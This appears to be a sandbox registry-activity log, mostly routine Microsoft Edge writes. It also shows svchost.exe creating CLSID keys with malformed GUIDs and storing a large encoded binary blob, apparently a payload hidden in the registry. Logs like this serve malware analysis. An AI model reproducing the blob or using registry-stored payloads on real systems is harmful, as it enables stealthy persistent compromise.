\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 5e522b343d99d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7108b7413d99d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{BC6E0A34-84B8-4D82-9C65-A10E68CB3C64}" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20EP1MI0-142C-L17D-YD26-2GCP283P3KMT}\1 = "4920" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{69RG4ZP0-857P-S13A-ZW93-6DTG316B7ZWC}\650478DC7424C37C\1 = 01000000000000000000000000000000000000010100000000000000000000000000000064650136363535303034343737383844444343373734343232343443433333373743430000568937b9e80509faad94ffc48f88d247df004d17ca900303000004040000ff00ff00b8b8000000000000404000000000000000000000000000000000000000000000000000000000000000000000101101000e11a5b40eb4bdc4ec99b94d81ec753c011a5350021d0815130c4d43020f00011b5442074552071b4e49074e640b1c734d020b014b2300072e24000000000000ae4b815dd36e8e60806e8e60806e8e603446e391846a8e603446e193f51b8e603446e0928d638e60bb0bd36286698e60bb0bd5649b748e60bb0bd465917e8e60891f65f3856b8e60806e8f61e20c8e6017a7d968836c8e6017a7d061806f8e6012a22f9f816f8e6017a7d263806f8e60383b0a0b826e8e606a00000000000000000000000000000000000000000000005015450064e28107b8495ccd6000000000000000f0f022022b090c0e00acac0000c8c80000000000d4f5210000101000000000808101000000101000000202000505020200000000050502020000000000b0b10100040400000000000202606101001010000000000010100000000000000010100000000000101000000000000000000010100000a0e647015c5c0000fcba47013c3c000000909101e0e1010000707101bcb10d00000000000000000000a0a10124220600f0c43501383800000000000000000000000000000000000000000000000000003005340194940000000000000000000000c0c000888a02000000000000000000000000000000000000000000000000002e5a111d0c740000802bab000010100000acac0000040400000000000000000000000000202000604e5c1605151561008a058f0000c0c0000090900000b0b000000000000000000000000000404000406e4a051515610000f0ec1c0000505101000a0a0000404101000000000000000000000000404000c0ee5e140515156100bcb10d0000707101000e0e00004a4b01000000000000000000000000404000406e49010f0d177300b0b00000008081010002020000585901000000000000000000000000404000406e5c010111630000e0e101000090910100020200005a5b01000000000000000000000000404000406e5c1709030c63002422060000a0a10100080800005c5d0100000000000000000000000040400042420000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000fb8b648f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f6434acb42c364e345b59182e5ba09450a19e5fa7b7a0d0d77b8e6554ccb42c54176f3a6e357a61c67105b44008dcfddf9e57bfd736398cffdd9e57bfd737a6ae579ca42697de579c34e6254be3f88cb42c343c27bd0574737b8a677e357a7b88cc27bd05d5f25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f000000000000000000c3b8b649c35a98f3ba2626000101000066e345b4687ae57bd8576119b8778946ac61b17e02b8f5404acb41c064e345b591ebb8b531faafe57bc93e8a1f9a0000444bb8f5404acb41c06423c045cf8b4bce010049f0464141fcfc0808fc0c101f41cccdffd9e57bc14e7e06b8778946ac62b37c6827c27bc943524627c27bc14e6ee63e89cb41c0817adb2d801d930100444bb8b56423c045b5b34bcca6647bf10688fb7d01000fb8b564e345b45240f6f6e57bd82f88ef6901000fb8778946ac61cd8cd85a01000fb8f5404acb41c064e345b5a964b9010000c3a5e57bcb3c8a13960000444bb8f5404acb41c06423c045cf8baf2a010049f0464141fcfc0808fc42cccdffd9e57bc14e7e06b8778946ac62b37c6827c27bc943524627c27bc14e6ee63e89cb41c0817adb2d807ef10000444bb8b56423c045b5b34bcca6647bf106885cdb00000fb8b564e345b451b5f6e57bd82f884fc800000fb8778946ac61cd8c38bb00000fb8f5404acb41c064e345b5a964bb030000c3a5e57b9a6d8a1b9e00000fb8f54064e57b9b6c8a159000000fb8f5464ccb41c460e57bc93e8afb7e0000444bb8b56423c045b40035f8444341fc42cccddff9e57be16e7e06b877814eac62b36350cccd90b6e57bf17e6b7a27c27bc94561ea3e89cb41c0817acb4d407b4bb8b56423c045b5b2447adb5c4e3fb8b564e345b4564469105b440066e57bd8576b13b8778946ac61b1601cb8f5404acb41c064e345b5915cba020000c3f0f3030f00000000000000000000c3b8b649c35a98f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f5404acb41c064e345b59182e5b96e1cc5c748770d77b8a65476f3a6e357a61924f3454141fcfc0808fc8ecffdd9e57bc14e7e06b8778946ac61b07e6ae579cb43697de579c34e6254be3f88cb42c343c27bd95e4737b8a677e357a7b88cc27bd9545f25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f000000000000000000c3b8b649c35a98f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f5404acb41c064e345b59182e5b9483ac5c748770e74b8a65476f3a6e357a60439f3454141fcfc0808fc8ecffdd9e57bc14e7e06b8778946ac61b07e6ae579cb43697de579c34e6254be3f88cb42c343c27bda5d4434b8a677e357a7b88ccccda86b7bf27d5d25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f000000000000c3b8b649c35a98f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f5404acb41c064e345b59182e5b97e0cc5c748770e74b8a65476f3a6e357a60439f3454141fcfc0808fc8ecffdd9e57bc14e7e06b8778946ac61b07e6ae579cb43697de579c34e6254be3f88cb42c343c27bda5d4434b8a677e357a7b88ccccda86b7bf27d5d25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f0000000000008c15031ec96df419010048c38eba853b01487bf78cc10da02401010041be3780c362a8c27bfe098807800000492aa38cc1889f701500beca070cec741800494acb371ea9c5b8133b1c01ebdf7cc5b858701c01ebc063c5b8f1d91c01ebc96ac5b83e151f01ebf251c5b8577c1f01ebfb58c5b89cb71f01ebec4fc5b8c5ee1f014cc7599ac34d8a67fdd9109f80000000444bb8bf4e49b8b314556ee3bd7c41cb43c247c045b59cacc04cbc576ac34632ea2e91aa0083bec9b64301324f7bf9fa1d4e5701b8b9010000e9a84302000fb8b54ac135986441010033cc38c2ce8943010101000089b4cca4540166e345b45864f1b9262600010100006669105b440066e57bd8576119b8778847ac62b27e02b8f5404acb41c064e345b591a0cf4483c74c8ef3bb212000010100000f105f400fb8bd6ce57ad957655b46ac69b97f6ae57af07c6d51ca7b9b1e6f5acb41c06424cbc5087471be3e88b63f2b389a2aa2894bc38875f5c800000f8c44c60100665f04a7ce550148c115b81c3901004cc53d906c4901004cc1b8660654014cc53598341101004cc1b04920550166eff578343f8b1d990000665f040f6754010f8b088c00004cc1c9601479c24c8a66ec579fb8a7524db8bb0c2bfaa47d40cb43c2874cbc996957a61c2071041c755501742be6b9080800e88d6207008b86eab3550148c5985d531a0189c568046dc64586c34385c64c8fc35327ea2799ab004cc78eeeb8520148c3586ab801000041beaf1008c34023a35e150089b494fd550166efb4e789520166efb49ef755010f101f0fb8f3780c5624cb8d3b77c5f27d64e345b598a1c737983411010048c3458267ddf9b8b66727c88d0a46c5c44b64e345b59aa7c34632ea60dda800ffeab20daa004cc73f906c49010048cb4b37f0101f66e5ff3a440248c5cd41748179894147020000b9bb020000482b9bb0c35c28ea318ca80048c35390cd45b4023ec34337ea368ba80048cd45b41c24c74c8fc35d9ec3432030439b0048c34034ea1aa7a80048c3586ab40d0000ffea5ce3aa0048cd45b441cafadb8d5201b8b901000048c317b81c39010048c337986441010048c307a824010100487bff249972030048c945dc1901005e039e8bc34034eabb09a70033f32b222169850400ccbf6615007c691500859015008e9b150097821500a0b51500a9bc1500cc0000000000000084cb6fc41bfa36eab905a9008545cf8bc6430100b9b40d000048c1d57804dfead16da9008545cf8b94110100b9b40d0000ffea8c30a90048c35390cd45cf8b8c09010048c34337ea299ba7004cc75390cd45cf8b77f3000048c34320f8e708007a45b45762f9bc04000049c2589bc34023c3d7030000ea50eca90048c3d7780413f388cb47eceb8ac24023392806007a45b45762f9bd05000049c2589bc340231407040000ea03bfa90048c3d7780413f388cb47eceb8ac240238a9805007a45b45762f9be06000049c2589bc340232536040000eaf24fa80048c3d7780413f388cb47eceb8ac240231b0905007a45b45762f9bf07000049c2589bc340237665040000eaad10a80048c3d7780413f388cb47eceb8ac24023fce30800bbcf4b89c2589bc340239e8d040000ea8538a80048c3d7780413f388cb47eceb40be30323e01324f7bf9fa34635301ffea7ac7a80048c3d7780413f388cb47eceb0f00008c171fcb6fdc03cc38c2336750010101000033e15bb43f50530141f970c8000089b4cfa3500148c5802e725001c7c21044500101010000c7c2aa913f01f4f50100e8926f150033e19ac580dc80500141f970c80000e88e73150048c1d57864d078d3c501007ebc90fc5001e8eb03000f811c920000487104f99451017402105f04f69b510174190b5f04afc350017410ddb9080800e81ef503008b86752950014cc1807428500189c568046cc1889bce510148c34380c598d1d3160148c35327eaae1ca7004cc78e7124510148c3586ab801000041beaf1008c340233cc5110089b40f63500166efb45e33510166efb4117d5001b94df5010089b4204c50018984e6d63c01ebed8d86eede3c01ffeae859a4003904127f51010f8ac4be0000b7c3d7786473f349b41d70510148cb47f46f9c0f0000000000000000000000000084c184f4b64e0133f3030f000000000084cb6fc4abbeccbe4e0101c6c2e6ac4e010000000075687b69109b8400000000b94df50100ffea8031a40083bef7854e0101759855dd640000ffea9425a40033f388cb47eceb0f00000000000000000074b90100003beba57e438fc289c34e0100000000c30f00000000000000000000000000000000aa0069109b8400000000487336340d3501f287675a8900d17691363e000d8777f0318b8908d9f9de370000cc00008c131bcb6fcc68c352eafa36ea66d7a40048c34034ea77c6a400ffea79c8a40048c34372b30d04c088cb47e47b13b7da45c4a40048c1c5682c40cb6fd481ae170000e83b4695008545b473bebb020000cde461c580fece3c01e822cb010048c3cf601c70c18cdfe43f0148c5c9601c70cb43c840c18c6f543f0148c38ec6fd3f0148c18c31093c0148c3cf606408c18c3d063f01c7c20b333c01090d04c007c20d353c0101010000c7c2172f3c0101010000b8b00800004823abc048c58007373c01488fc30503020000b8b00800004823abc048c3864f71320148c1c5482498b00800004823abc149c3863806320148c1c5482468c5803c97a600e8e8ff0000b7cb47fcfb0f000084cb6fc491b1080000e8ee06000048cb47eceb0f45c5682c40cb6fc491ae170000e8047894008545b47c83cf6014bb4305e461c58006363c01e89a72000048c3cf600c60c18cf7cf3c0148c5c9600c60cb43c840c18c87bf3c0148c38edee63c0148c18c49703d01c7c2370e3d01090d04c007c229103d0101010000c7c2330a3d0101010000b8b00800004823abc048c58023123d018bdf701478c19d1549c58072daa500e8a6b00100b7cb47eceb0f84c1d57804771fcb6fac08c35226ea8c3ba20048c33043f8000048c5d9707418c3448a76f33fea9c2ba20048cd45b4467acbe7401c3848c5c1687c10c3df70741cc74380c1c568147cc74c8fc5c1684428c1c5680c1bfa81c1d57804dfea4ff8a20048c3d7784c20cb47841f9c0f00008c1305011fcb6fac08c35226ea3e89a20048c3384bf8000033ccba76f388c5d9704428c34531ea0cbba20048cd45b44d71cbe7401c3848c5c1684c20c3df70442cc74380c1c568147cc74d8ec5c1685438c1c5680c1bfa81c1d57804dfeaff4ba100ff38447cfd7ecdf9cb47841f0105980f0000257e940300cc000084cb6fc4ad57a64dba69eb755cab69eb75629579fb757eb2b901000048cb47eceb2bb25e0400ebeeedc32f04000fb97688cb47eceb8ac25b98cb47ecc1e60f00004dc845cf9a5489cb47ecc1c52d010048c1d5782c40c1fd503458c1f5580461171ecb6fcc68c379bec77ac2fa2126ca04008444b57234f32901e80000e8a64d03008a5250cc606400f7b682bed3d13e0100747eb3be070000e8fa1a0800c7c2dde73e0101010000e87b9003008444b4138faa4b090048c5808a8e0900e83ad40600e87996070048c580979d0700e829c70600e844ab070048c59874c2a30048c5803799a300e851a31a008545b55cc1f01b03008444b45468c5980cbaa30048c58007a9a300e8c93b1a00c7c26e543e01020200004072cd7541233dd0050040c47bf08acbb10000179b74070048c35390cbbb3874506cc34320f21f05008444b46c50c39053c34023ab4a09004cc74d7cb802000049c245312c2cfa1d273e01b8b901000048c3d7781478c3ff501c70c3f7586c00cb47e4611f9d0f84c1d5782c40c1fd503c4f1fcb6fcc60ca7b7a8ee1da3f0133e85e45bf7b37f32bbbaf37418cd7ec3f01e8cd27020040ca7270cc601cbbbefaf93f0102767eb3be070000e803ed0600e8da3103008994ad8e3f01e8bf54030040ca4527ff12050033e192ca4426d93405008444cf9a5648488bc3d7781478c3ff506408cb47e47f9c0f0084c34f8cc1d1786cc5c95891d94058c1c1405e0116171ecb6fac09c27b7b71b6c77a7457a77a362c59723f017f7834f3295bb200008dcfbd7c7bf9765dc25eb600008b5351cd6014b545cf8b098d00004cc74d4d5c9ec245264b5e0200745351cd6014b545b4023ac74d4d5c9ec245267c6e0500745351cd6014b37cfe745eae45b5526bc74df5e19bc2452690820500b3c74df5e19bc245268b9e0200b3c74df5e19bc24526a64e0000857a8b71867cfc765f66c74d4d5c9ec24526a8bd0200745351cd6014b545b4675fc74d4d5c9ec24526c92100008b5351cd6014dbed35e852d57814bb488bc3d7785c30cb4784011f01019d0f000084c1d5782c40c1e5483458c1fd503c4f1fcb6fcc68c3969824a10049c2737379bac362a1cd5eae7088ce42eaf95ac340238b6407004cc74c4c5d9ec346322c9bc3d7781478c3e7481c70c3ff506408cb47e47f9c8bc1d5782c40c1fd5034471fcb6fcc69c273735192c37a7279fb7470edd73b04004cc74c4c589bc34586c3d7781478c3ff501c70cb47e47fb69e89010033000025b6471800cc00008c131bcb6fcc68c35232ca69c34023b14118008545b5675acb78048a72efba5a0800ebeeedc323080048c3402347b7180048cd45b4a19dcb47e47b988bcb6fc4c0db390a008545b455442dc38f211530000048c3c340e3ee4d73f3bc6027f330b847bebc81b03d01759bdcf288cb47eceb73b1ea1c3b000084cb6fc4c01ffe09008545b473eff6160800ebf2f137d609008b4320986e1e008545b47036f22becef1fd62100b0b149cb47eceb8bcb6fc41bfa21a94001008444cf9a5588cb47eceb0f000084cb6fc4c0cf2b0c008444b57136f22bf9fa4a8527008444b572efcd290c00eb075cb149cb47eceb8bcb6fc4c073bc2700e8e6020c00b0b149cb47eceb0f000084c1d5782c40c1e5483458c1fd503c4f1fcb6fcc69c272b0c27b7b5192c36201b85909008545b5629478fa74675ac344272bc605004cc74df5e19ac34632289fc3df707cd3c7687418c3d7781478c3e7481c70c3ff506408cb47e47fb66a941700cc000084cb6fc4c0ef0e09008545b46458c5808dbb3a0148cb47ecc10ec32400e8be4d1b008545b570edd92a1b0048cb47eceb8bcb6fc41bfa21f936270048cb47ecc1799b0b0040131bcb6fcc2fb9b376483a01854c72ba0100000f4b874b8d66583a01e832dc0600e805e70a008444b57136f22bfffc60ae26008444b57c3afa21d93a0b00eb0160498bcb47e47b980f000084c1d5782c5d1dc367a4cb6faccb525a7af80e8821a60000e88b6b08008545b45fae5eae526fc580d5e23b01e8975b24008545b47036f22b9132c580d1e63b01e8834f24008545cf9b542b8c2fc39e8cb22a0149ca4b3774497bf94000008363df14e378b1489a1b847ff18ec5cca5acc5ccade71f55a5acc5ccb502fd1f5dbdff1e1478473b014cc5cca5acc5ccade71f55a5acc5ccb502fd1e1c784f3b01f2fd1f5dbdff1e14744b3b01f2fd1e1c74433b0148c3d7787418cb47841d9e7abc050000e8b45e0200cc00000084cb6ff454c74a79f5175a00665f3c08d624008a0c312b66459b2400b7c598e8272500b7c5811c91b869154500752ae7b3090200665f78596d211867e9cdb8f6555cc5dc49504bd3dfb8f6474ec5818cccc181c682c19d306d72eaa56c93c1464077fab37881c94a0bc28d77fbb27a40cb41eac334ece19acd57a77136f22bff97f95e247d7936f22be1bab1eaed34f22be930f288cb47dcdb0f00008c131bcb6fccaa5331e30c070033e15745b47f8f5fae724fcf92634f380148cb47e47b9883131bcb6fcca0bda6a23801008a53ad708056a77b844123e82525008a41239d7c0900b0b149cb47e47b980f8c131bcb6fcc68c39e320d2b0148c3525241827b26260a38018362de779b1982cb79058a7f42c34023975d2200ebe447c3589bc5801e2a3801e812d8220033fa4c4588474b8f83c34a89cb47e47b980f84cb6fc4c04f580000b7bf2fc3db372f273780cb47eceb0f84c1d57804751dc367a4cb6fcc68cbe67d1848f389907df2b4b22b0048c38eac8028014873f8b61a27c5c055e7ea2fa09a0048c3ce5d50c1cc55efea31be9a008b4b88797455efea058a9a008b4b88c5c06d68797455efeaed6199008bce6568c5c05d588921c0687b7665687b7655587bf289f1460000000000ff00486be289f18a917df2b4b22b004873f88b474b8589c18c301c280148c3d7786c00bf2798c18c2b07280148cb47e47d9e8bc5806451390148b7da9f239900cc0084c58054613901e98564080048c58858653901c38bc58858653901c38bcb6fc4c00f180000b7cb8b0cec0e190000b7cb8b0a4acb47eceb0f84c588b4f44401c340a61c01390100c38bc1d5782c5d1dc5218864bb0400b7c96d2cc505008b5260ae170000e84d2f8a008545b4708f4006e4aaa62d3039010048c5c0bdc3e193f968d40400e8df3f080048c5c0bd0fead05d980048c31675e8000048c5184ddc040048c3408e76f33feaa62b980048cd45b44874cbe7401c3848c5006de4040048c31e4ddc04004cc74380c1c568147cc7488bc50065ec040048c1c5680c60c5c0bdb8c1c5680413fa36ea6fe2980048c30e4dcc040048c5c1687418c10c6de8000033e19ac5084dcc040041f92098000048cb43c840c10c0d880000e848a7070048c30e4dcc040048c1cd6044a7836074451500408783607055010000ffea6be69800837bf949c5c9607418c1cd606408c5c8b5ff9b578bc1cd606c7bfa36ea008d980048c5c16864bfea179a98008545b57ffc2dc0dbe1240133360148c317b8f4d5050048c94504c505005d9e0f000084c1d5782c40c1fd5034471fcb6fcc68c5901718130148c5b836111301ebfd5ec3b073cd7a8b7e42c3442781690000ff289fcb40cb4073e5ac97adc3d7781478c3ff501c70cb47e47f9c0f0084c1d5782c40c1fd5034471fcb6fcc68c590d3df100148c5b8f2d61001ebfd5ec3b073cd7a8b7e42c34427f51d0000ff289fcb40cb4073e5ac97adc3d7781478c3ff501c70cb47e47f9c0f0084b7da4cf09900cc8c131bcb6fcc68c35291c3498ac580f064990048c18243c5de5b3bfa81c18342c1c34240c5c540e0ec0c080048c58808979a0048c18a4bc3488bcb47e47b980ffff388c1c85158c58806999a0048c1c84940c588ed71990048c18849c34a020f8c131bcb6fcc68c35291c3498ac5809004990048c18243c5de5b3bfa81c18342c1c34240c5c540e04ca3070048c588d04c990048c18a4bc3488bcb47e47b980ffff388c1c85158c588ce52990048c1c84940c588b529990048c18849c34a020f8c131bcb6fcc68c35291c3498ac58030a4990048c18243c5de5b3bfa81c18342c1c34240c5c540e0ac43070048c3488bcb47e47b980f000084c5881488990048c18849cb42c9e15cb20700cc84c1d5782c5f1fcb6fcc68c588f66b980048c372b1c1888a5192cb42c9e07a950700f635c27579b7a218000048c34427ac46020048c34c8fc3d7781478cb47e47f9c0f0084cb6fa400c5c16804c80a1c0100b7c59836381a0148c5c16804c8917e0700cc84cb6fa400c5c16804c8cadd0000b7c5989e901a0148c5c16804c8b15e0700cc84cbfa710848c588811c980048474a0449cb0f0084c1d5783458c1f5583c4d1dc367a4cb6fcca3e68de833fafaf307c231112401020200000fade6cf4a06c22404240101010000817092220c0900cf418ecf5993c070940b1a1d28c0739b070b2c08c0719e1a1109294edb94cf509fcf8e4a7b350141c072b234011c2d4ed25258974fd25873b5220b1b46fa4273bc4fd96ab90100000fad2bccb5b4cf428dcdc4b5734341d4a97ddca9b9c057a7271acb8eb49d2501ffbec24bcc21d5cfc0f04bcd8cf8ce32013dfdc60701745c155d66040274551c4d760402746e1fb54905037c7bd8576c53f3ba010101010100004847ac60b0784ac24bc945cd8cc6f0320145c05eae6c9860e10fffff8e78f90f6f6072794ac24bcc40cd8ca0963201b8bf07000089dcb5a4cdc4a9dfc3845817fac6ad2bccb579d4a97dc4b571dca975d4b5e7b559ea7a784ac24bca46cd8c74423201414eb55bf5671da9c20120250102020000c7c2fbdd220106060000414eb55bfa6820124eb55bfd6f3f7ffac60ed1988923c26843db98c1dc4558c3ce5534223a3a7347b98ed5f32201834bc0cfc2ba9c220103030000f6b3adc8a98cbc9a22017467904be8e7c2a385220105050000898ca187220148c3d7781c0bf388c3f7586408cb47e47d9e0f0074b9010000c30f00fff3f93c397c41010f9a550301c200cc25829e0a003300008c131bcb6fcc68c588fa69960048c35291c188f734c3757eb0a2180000e83e290000b7c3488bcb47e47b980f000000000000000084c1d5782c40c1e5483458c1fd503c4f16151514141717161fcb6fac0dc6ea6940c362a4c6b270c24381c2d2617566d7b1c67ab8c273b4c761026a7d000009b34162698a65e0000041cafd3e00c1e5481478c1f5581c03083c8cf97b01008b75b64bfc74cfbfff4877c3f78d28aa00008bcfbff34477c3f78c1e9d000083ff87eb100f8b1692000083ff87f70d75639ccfbff744c5c16814794ac78dc25e2a2f5545b805030af5fc7d63101e8d955d60cbbe6c6e3e0100746a56c58045773e01e8533f84008545b47ab4bb01000048c34632ea240e3e018bc7b7eb51f9b9010000494acf85c25e3dbc51050049c2cd060cc74e4edfafeb59c24689cfc64d494ad79cc1cd600c61c2cd6e60c1cd6004dfeac6419200e8be530500ff392fdcca0000ccf3295cb5000049c2fd5661caf5360162df1d7f9600008b44874bca42cf8fcf4877c3f78d008200008bcf8fc34477c38b0a3dcfde5145c261c254300176fa4c57a64c7dce4a8c4ec382c9cf87c74c73cb825262c9cf87cb4073cb83659dcf8fdb527b7d87d3657e80cf8fc74e7b7d87cf787c49be3e857ff1b8ba8c7ff1bf42bccf8fdb9545b4784473cb856b5bc057a750cefc9aca4648c25e94c8cf0e0ccfcf8fc7bdb04c4ec785be2f2f384c9828c1f58de29f000047b90100004cc1d1786409c2d06b79c2e05371c2f83309c268a21e1e1f1f1c1c1d039c0f84cb6fc4c043a10a00e8f2100a00e819f405008444b57136f22bf9fa688505008444b572efcb250600eb075cb149cb47eceb0f0084cb6fc4c043af040048cd45cf9a5588cb47eceb8bcb6fc41bfa21ad410400b0b149cb47eceb0f0084cb6fc4ac4dbc64f99f720500e836db050033fa2117f60900b0b149cb47eceb8bcb6fc4c0b35e0500b0b149cb47eceb83131bcb6fccdfea49cd910048cd45b4675bc39350c343206c9f1b0048c3488bcd5eae98a5cb47e47b980f00000000000000000000000000000000000000aa0069109b84000000004cc752d6b9649bf0b8000000000000004d43a06583ca7be81f8984030100662f4661afa7696fa089c879788000000f89fa7c00000fb59fada72e01017251a9498ac35c9fc372b0c2433b59e2c371b3c24800a5000000000069109b84000000000f1e104d4fc289cb42d158cb6211bc67ea8cc643818828ee73425069105b44000f26280e26685158c940418000000f2668e1af2668f1f9b636c6266881cf266891df2668a186692668b185a19dca639f32c643818828ed70671c109f800000000f1e1049cb42d159b636bc81bdca63ef7b72474e1e554cf8b9c248003dce3000fbcb300027163100f7c73000043531001425310024153100f4c430002c1d3100083931004071310030013100003131001021310020113100f0c030004879310049c25a9dc1802be93000bcc80f050dbc30004c4fcb814acb81c24882be1e87f6d8c1d8a078d8a89fefd8ac75d9ae3c53d8c1d8a57dd8ad3f8bc1d8a67fd9ae3c8bc1d8a27ad8aa73d9ae3ccc105b440048c1d8a37bd8ab9cefd8af3d8bc199d38bc19976efd95880d85ac9cc105b440048c19976efd958cb8bc19958c1d958cb8bc1d5782c40c1fd503458c1f5583c59171ecb6fcca0f971084cc779bac37a853804c38a49cd45b4300ccb4c30b7b73847bc04387582bfc5c24ee98564090048c35390cd45b46850c78d4ec5da5649c34320ea181a0048c3488287804e0948c08f35e893c3402355b50800ebe142c38a49c18bc4844a0848c3d7781478c3ff501c70c3f7586408cb47e4611f9d0f00008c131bcb6fcca0f9710848c352ad7c40c382e169890800c6854b0848cba02348cb47e47b980f000084c1d5783458c1fd503c4d0216171ec367a4cb6f8c6f272d990d910048c379fd2725af3391004cc77afe266c85cf272da13591000f26649ddf2725a43891000f266ca5ef2664bdb8cd57a656d4f412646955c3b271c3ccbfb0c3d31808c3fb4078c34023405e0900b7c5c2b7072c9bc5d8756cc5fc9da0c34586c1fc850fea58c38e0048c1cc6568c35b98c1ccbdb0cd73826fedf00eb1b940d99875718cc4ad0be787cea5a8cd57dd4b8548cca5a4cfce9d94c1c0ad6bde914fc68d3fea03988e004cc1d1784429c2d07361c2f84379c268a21f01029e0f000000000000aa0069109b840000000048c96d34dc04004d7ef38d7efa81c1ed40046cc5cd600cc010867e0048c9451cdc0400c30f0000000000aa69105b440048c1c5682c40c1dd703c5ccdcd6034598e06e125968af2e3c40000000000aaf6530f0000000000aa69109b8400000000c30f000084cb6fc460cd4cbd6559c58819302d014873f3bc71ed728d170048cb47eceb0f8c131bcb6fcc68c3525286a0b11d01837a068b477bcd5eae7be6d63a04008b8695841d0148c353ebe13a6a86040048cd5eaf605cc588d7f92a014873e3ac7c40c34023a55a170048cb47e47b980f000084c1d5782c40c1fd5034471fcb6fcca3be6b4a1d01ff8a7234f32960890000ffeaea738c008b864c5d1d018b731032d9030048cb4935ccc5be